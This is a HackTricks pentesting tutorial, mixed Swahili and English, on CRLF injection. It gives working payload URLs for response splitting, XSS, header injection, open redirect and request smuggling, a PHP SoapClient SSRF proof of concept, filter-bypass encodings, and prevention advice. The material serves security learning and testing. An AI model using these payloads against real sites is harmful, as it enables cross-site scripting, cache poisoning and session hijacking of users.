hacktricks/pentesting-web/crlf-0d-0a.md

# CRLF (%0D%0A) Injection

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Bug bounty tip**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers**! Jiunge nasi kwenye [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na uanze kupata zawadi hadi **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

### CRLF

Carriage Return (CR) na Line Feed (LF), kwa pamoja wanajulikana kama CRLF, ni mfuatano wa wahusika maalum unaotumika katika itifaki ya HTTP kuashiria mwisho wa mstari au kuanza mstari mpya. Seva za wavuti na vivinjari hutumia CRLF kutofautisha kati ya vichwa vya HTTP na mwili wa jibu. Wahusika hawa hutumika kwa ujumla katika mawasiliano ya HTTP/1.1 kati ya aina mbalimbali za seva za wavuti, kama vile Apache na Microsoft IIS.

### CRLF Injection Vulnerability

CRLF injection inahusisha kuingiza wahusika wa CR na LF katika pembejeo zinazotolewa na mtumiaji. Kitendo hiki kinapotosha seva, programu, au mtumiaji kufasiri mfuatano ulioingizwa kama mwisho wa jibu moja na mwanzo wa jingine. Ingawa wahusika hawa si hatari kwa asili, matumizi yao mabaya yanaweza kusababisha kugawanyika kwa majibu ya HTTP na shughuli nyingine za uhalifu.

### Example: CRLF Injection in a Log File

[Example from here](https://www.invicti.com/blog/web-security/crlf-http-header/)

Fikiria faili la kumbukumbu katika paneli ya usimamizi inayofuata muundo: `IP - Wakati - Njia Iliyotembelewa`. Kuingia kwa kawaida kunaweza kuonekana kama:
```
123.123.123.123 - 08:15 - /index.php?page=home
```
Mshambuliaji anaweza kutumia CRLF injection kubadilisha hii log. Kwa kuingiza wahusika wa CRLF katika ombi la HTTP, mshambuliaji anaweza kubadilisha mtiririko wa pato na kutunga entries za log. Kwa mfano, mfuatano ulioingizwa unaweza kubadilisha entry ya log kuwa:
```
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```
Hapa, `%0d` na `%0a` zinawakilisha fomu za URL-encoded za CR na LF. Baada ya shambulio, log itakuwa naonyesha kwa njia ya kupotosha:
```
IP - Time - Visited Path

123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```
The attacker thus cloaks their malicious activities by making it appear as if the localhost (an entity typically trusted within the server environment) performed the actions. The server interprets the part of the query starting with `%0d%0a` as a single parameter, while the `restrictedaction` parameter is parsed as another, separate input. The manipulated query effectively mimics a legitimate administrative command: `/index.php?page=home&restrictedaction=edit`

### HTTP Response Splitting

#### Description

HTTP Response Splitting ni udhaifu wa usalama unaotokea wakati mshambuliaji anatumia muundo wa majibu ya HTTP. Muundo huu unachanganya vichwa na mwili kwa kutumia mfuatano maalum wa wahusika, Carriage Return (CR) ikifuatiwa na Line Feed (LF), kwa pamoja huitwa CRLF. Ikiwa mshambuliaji anaweza kuingiza mfuatano wa CRLF katika kichwa cha jibu, wanaweza kwa ufanisi kubadilisha maudhui ya jibu linalofuata. Aina hii ya urekebishaji inaweza kusababisha matatizo makubwa ya usalama, hasa Cross-site Scripting (XSS).

#### XSS through HTTP Response Splitting

1. Programu inaweka kichwa maalum kama hiki: `X-Custom-Header: UserInput`
2. Programu inapata thamani ya `UserInput` kutoka kwa parameter ya query, sema "user\_input". Katika hali ambazo hazina uthibitisho sahihi wa pembejeo na uandishi, mshambuliaji anaweza kuunda payload inayojumuisha mfuatano wa CRLF, ikifuatiwa na maudhui mabaya.
3. Mshambuliaji anaunda URL yenye 'user\_input' iliyoundwa kwa njia maalum: `?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
* Katika URL hii, `%0d%0a%0d%0a` ni fomu ya URL-encoded ya CRLFCRLF. Inapotosha server kuingiza mfuatano wa CRLF, ikifanya server itendee sehemu inayofuata kama mwili wa jibu.
4. Server inareflect pembejeo ya mshambuliaji katika kichwa cha jibu, ikisababisha muundo usio kusudiwa wa jibu ambapo script mbaya inatafsiriwa na kivinjari kama sehemu ya mwili wa jibu.

#### An example of HTTP Response Splitting leading to Redirect

From [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)

Browser to:
```
/%0d%0aLocation:%20http://myweb.com
```
Na server inajibu na kichwa:
```
Location: http://myweb.com
```
**Mfano mwingine: (kutoka** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**
```
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```
#### Katika Njia ya URL

Unaweza kutuma payload **ndani ya njia ya URL** ili kudhibiti **jibu** kutoka kwa seva (mfano kutoka [hapa](https://hackerone.com/reports/192667)):
```
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```
Check more examples in:

{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}

### HTTP Header Injection

HTTP Header Injection, mara nyingi inavyotumiwa kupitia CRLF (Carriage Return and Line Feed) injection, inaruhusu washambuliaji kuingiza vichwa vya HTTP. Hii inaweza kudhoofisha mitambo ya usalama kama vile XSS (Cross-Site Scripting) filters au SOP (Same-Origin Policy), ambayo inaweza kusababisha ufikiaji usioidhinishwa wa data nyeti, kama vile CSRF tokens, au udanganyifu wa vikao vya watumiaji kupitia kupanda kwa cookie.

#### Exploiting CORS via HTTP Header Injection

Mshambuliaji anaweza kuingiza vichwa vya HTTP ili kuwezesha CORS (Cross-Origin Resource Sharing), akipita vizuizi vilivyowekwa na SOP. Uvunjaji huu unaruhusu scripts kutoka kwa vyanzo vya uhalifu kuingiliana na rasilimali kutoka chanzo tofauti, na hivyo kupata data iliyo salama.

#### SSRF and HTTP Request Injection via CRLF

CRLF injection inaweza kutumika kuunda na kuingiza ombi jipya la HTTP. Mfano maarufu wa hili ni udhaifu katika darasa la `SoapClient` la PHP, hasa ndani ya parameter ya `user_agent`. Kwa kubadilisha parameter hii, mshambuliaji anaweza kuingiza vichwa vya ziada na maudhui ya mwili, au hata kuingiza ombi jipya la HTTP kabisa. Hapa chini kuna mfano wa PHP unaoonyesha uvunjaji huu:
```php
$target = 'http://127.0.0.1:9090/test';
$post_string = 'variable=post value';
$crlf = array(
'POST /proxy HTTP/1.1',
'Host: local.host.htb',
'Cookie: PHPSESSID=[PHPSESSID]',
'Content-Type: application/x-www-form-urlencoded',
'Content-Length: '.(string)strlen($post_string),
"\r\n",
$post_string
);

$client = new SoapClient(null,
array(
'uri'=>$target,
'location'=>$target,
'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
)
);

# Put a netcat listener on port 9090
$client->__soapCall("test", []);
```
### Header Injection to Request Smuggling

Kwa maelezo zaidi kuhusu mbinu hii na matatizo yanayoweza kutokea [**angalia chanzo asilia**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning).

Unaweza kuingiza vichwa muhimu ili kuhakikisha **back-end inaendelea na muunganisho wazi** baada ya kujibu ombi la awali:
```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```
Afterward, a second request can be specified. This scenario typically involves [HTTP request smuggling](http-request-smuggling/), a technique where extra headers or body elements appended by the server post-injection can lead to various security exploits.

**Exploitation:**

1. **Malicious Prefix Injection**: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:

`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`

2. **Crafting a Prefix for Response Queue Poisoning**: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:

`GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`

### Memcache Injection

Memcache is a **key-value store that uses a clear text protocol**. More info in:

{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache](../network-services-pentesting/11211-memcache/)
{% endcontent-ref %}

**For the full information read the**[ **original writeup**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)

If a platform is taking **data from an HTTP request and using it without sanitizing** it to perform **requests** to a **memcache** server, an attacker could abuse this behaviour to **inject new memcache commands**.

For example, in the original discovered vuln, cache keys were used to return the IP and port a user should connect to, and attackers were able to **inject memcache commands** that would **poison** the **cache to send the victims details** (usernames and passwords included) to the attacker servers:

<figure><img src="../.gitbook/assets/image (659).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&#x26;h=178&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>

Moreover, researchers also discovered that they could desync the memcache responses to send the attacker's IP and ports to users whose email the attacker didn't know:

<figure><img src="../.gitbook/assets/image (637).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&#x26;h=506&#x26;auto=format&#x26;fit=crop"><figcaption></figcaption></figure>

### How to Prevent CRLF / HTTP Header Injections in Web Applications

To mitigate the risks of CRLF (Carriage Return and Line Feed) or HTTP Header Injections in web applications, the following strategies are recommended:

1. **Avoid Direct User Input in Response Headers:** Njia salama zaidi ni kuepuka kuingiza maoni ya mtumiaji moja kwa moja katika vichwa vya majibu.
2. **Encode Special Characters:** Ikiwa kuepuka kuingiza maoni ya mtumiaji moja kwa moja haiwezekani, hakikisha kutumia kazi iliyokusudiwa kwa ajili ya kuandika wahusika maalum kama CR (Carriage Return) na LF (Line Feed). Praktiki hii inazuia uwezekano wa CRLF injection.
3. **Update Programming Language:** Sasisha mara kwa mara lugha ya programu inayotumika katika programu zako za wavuti hadi toleo la hivi karibuni. Chagua toleo ambalo kwa asili haliruhusu kuingizwa kwa wahusika wa CR na LF ndani ya kazi zinazotumika kuweka vichwa vya HTTP.

### CHEATSHEET

[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777)
```
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)

2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com

3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
## Vifaa vya Moja kwa Moja

* [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
* [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)

## Orodha ya Ugunduzi wa Brute-Force

* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt)

## Marejeleo

* [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/)
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)

<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Usisahau**: **jiandikishe** kwa **Intigriti**, jukwaa la **bug bounty la kiwango cha juu lililotengenezwa na hackers, kwa hackers**! Jiunge nasi [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) leo, na anza kupata zawadi hadi **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>
{% endhint %}